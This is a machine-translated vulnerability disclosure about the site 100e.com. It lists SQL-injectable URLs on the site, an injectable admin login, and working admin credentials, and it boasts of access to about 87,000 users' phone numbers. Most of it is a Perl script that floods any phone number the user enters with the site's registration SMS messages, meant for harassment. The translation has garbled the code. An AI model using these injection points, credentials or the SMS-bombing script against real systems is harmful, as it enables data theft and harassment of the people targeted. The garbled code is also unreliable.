100e one hundred vulnerability collection

For details, multiple security vulnerabilities may cause leakage of million user sensitive information.
Http://edu.100e.com/course/instance? Id = 4091

 

Http://space.100e.com/myspace/MyDiaryList.asp? Username = admin

 

All are injection
Http://admin.100e.com backend
The login box is post injection.

 

U: 0001 P: 111 enter
What do you know in the background? The phone number of the 8.7W user is quite impressive.
The background is also injected.

 

It seems that the whole site is injected wherever the database is queried --
Shell won't take it, so it may be suspected of taking off pants.

Then there is a powerful SMS Ddos attack interface, where the registration is verified ~~
I wrote a script with perl to test it. It's easy to use!

 

Use strict;
Use LWP: Simple;
Require LWP: UserAgent;
My $ url = 'HTTP: // passport.100e.com/register/new/step_mobile.aspx ';
My $ ua = LWP: UserAgent-> new;
$ Ua-> timeout (10 );
Print "Enter the mobile phone number to attack :";
My $ dh = <STDIN>;
Chomp $ dh;
Print "Enter the number of attacks :";
My $ I = <STDIN>;
Chomp $ I;
For (my $ a = 1; $ a <= $ I; $ a ++)
{
My $ response = $ ua-> post ($ url,
['Postback' => 'postback ',
'Mobile' => "$ dh"]
);
Print "$ a sent \ n ";
}

Solution:

Inject for filtering, text message verification plus time.